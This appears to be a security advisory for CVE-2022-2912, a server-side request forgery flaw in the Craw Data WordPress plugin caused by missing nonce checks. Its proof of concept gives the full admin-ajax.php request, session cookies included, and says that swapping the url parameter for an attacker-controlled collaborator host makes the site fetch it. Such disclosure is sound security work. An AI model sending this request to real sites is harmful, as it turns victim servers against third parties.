Craw Data <= 1.0.0 – Server Side Request Forgery | CVE 2022-2912

Description

The plugin does not implement nonce checks, which could allow attackers to make a logged in admin change the url value performing unwanted crawls on third-party sites (SSRF).

Proof of Concept

When configuring the CrawData addon, the request is as follows

GET /wordpress/wp-admin/admin-ajax.php?url=http%3A%2F%2FTARGET.SITE%3Fpage1.html&action=crawDataAjax HTTP/1.1
Host: vulnerable.site
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://vulnerable.site/wordpress/wp-admin/admin.php?page=ot-page
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=dn%7C1653675200%7CvLuUw1iVb1C4dE16OPdeTTKf0KtD6Uo8ZW65rn3VQAA%7Ccbcd17b27ea9476f321e86fda7ecef8f5933ebd3f4305f2404dd4c8974b66faa; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=dn%7C1653675200%7CvLuUw1iVb1C4dE16OPdeTTKf0KtD6Uo8ZW65rn3VQAA%7C622f3fd0b44a0ad5a74e24bab674c000ef47739fc78c7c496e20f786013b9424; wp-settings-time-1=1653502574
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

- Replacing the http%3A%2F%2Fdnoscp.com%3Fpage1.html with http%3A%2F%2F<BURPCOLLABORATORCLINETURL> successfully makes the request as the Wordpress instance
- SSRF Identified